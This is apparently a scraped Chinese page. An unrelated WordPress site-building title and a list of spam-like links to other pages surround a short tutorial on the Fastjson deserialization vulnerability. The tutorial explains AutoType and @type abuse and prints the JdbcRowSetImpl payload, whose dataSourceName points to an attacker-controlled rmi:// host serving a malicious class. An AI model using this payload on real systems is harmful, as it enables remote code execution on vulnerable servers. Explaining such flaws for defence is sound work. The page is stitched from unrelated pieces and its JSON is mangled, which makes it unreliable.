当前位置: 首页 > news >正文

申请自助建站wordpress纯代码生成海报功能

申请自助建站,wordpress纯代码生成海报功能,谷歌网站站长指南,360安全网址导航fastjson漏洞 fastjson工作原理攻击原理补充 例子 fastjson工作原理 fastjson的作用是将JAVA对象转换成对应的json表示形式#xff0c;也可以反过来将json转化为对应的Java对象。fastjson使用AutoType功能进行反序列化#xff0c;AutoType使用type标记字符的原始类型#x… fastjson漏洞 fastjson工作原理攻击原理补充 例子 fastjson工作原理 fastjson的作用是将JAVA对象转换成对应的json表示形式也可以反过来将json转化为对应的Java对象。fastjson使用AutoType功能进行反序列化AutoType使用type标记字符的原始类型在反序列话时会读取type以此把内容反序列化到对象在上述过程中会调用到库中的setter和getter方法 攻击原理 攻击者传入一个恶意构造的json内容程序对其反序列话后得到恶意类并执行了恶意类中的恶意函数进而促使恶意代码执行 合理构造一个JSON使用type指定一个想要攻击的类库就可以实现攻击 补充 仅影响Fastjson1.2.24及之前版本 例子 {b: {type: com.sun.rowset.JdbcRowSetImpl,dataSourceName: rmi://攻击者的IP地址/恶意类,autoCommit: true}JSON 数据包这里展示的 JSON 数据包包含一个名为 b 的对象其中有一个 type 字段指定了这个对象的类型为 com.sun.rowset.JdbcRowSetImpl。这是一种 Java 对象类型。恶意数据在 dataSourceName 字段中提供了一个远程方法调用 (RMI) 的 URL指向攻击者的 IP 地址和他们控制的恶意类。这意味着 Fastjson 会尝试从这个远程地址加载并执行恶意类。自动提交autoCommit 字段被设置为 true表明在反序列化后自动执行某些操作。
http://www.hkea.cn/news/14300214/

相关文章:

  • 网站备案密码 多少位wordpress简
  • 如何做网站赚钱6wordpress减少请求
  • 访客留言网站wordpress 小说系统
  • 网站开发和程序开发的却别网站建设服务平台
  • 2网站制作舆情报告分析
  • 找我家是做的视频网站有网站源码如何建站
  • 长沙模板网站建设怎样重新下载wordpress
  • 网站开发预留接口自建企业网站教程
  • 教育网站开发需求上海工业网站建设
  • 公司网站建设招标文件范本江苏专业做网站的公司有哪些
  • 网站内链怎么坐锚文本深圳市建筑工程交易服务
  • 观澜小学 网站建设百度快照网址
  • 营销型网站需要注意甜品网站模板
  • 网络公司除了建网站做网站月入
  • 巩义公司做网站办公楼网络设计方案
  • 做百度网站图片怎么做网站设计公司西安
  • 做红包网站网站域名可以自己做吗
  • 辽宁建设集团招聘信息网站wordpress 几天前
  • 网站改版iis301跳转如何做php采集wordpress文章内容
  • 餐饮营销型网站案例百度公司的企业文化
  • 个人网站 备案 广告产品内页设计
  • 什么叫宣传型网站中学加强校园网站建设
  • 网站建设教程科普论坛网站开发模板
  • go 是做网站的吗seo排名软件哪个好
  • 优化站点莱芜在线和莱芜都市网
  • 达州建网站旅游网官网首页
  • 网站如何制作做吸引客户福建搜索引擎优化
  • 西安凤城二路网站建设班级网站源码
  • 网络设计制作服务百度关键词优化排名技巧
  • 可以发描文本的网站影视文化网站建设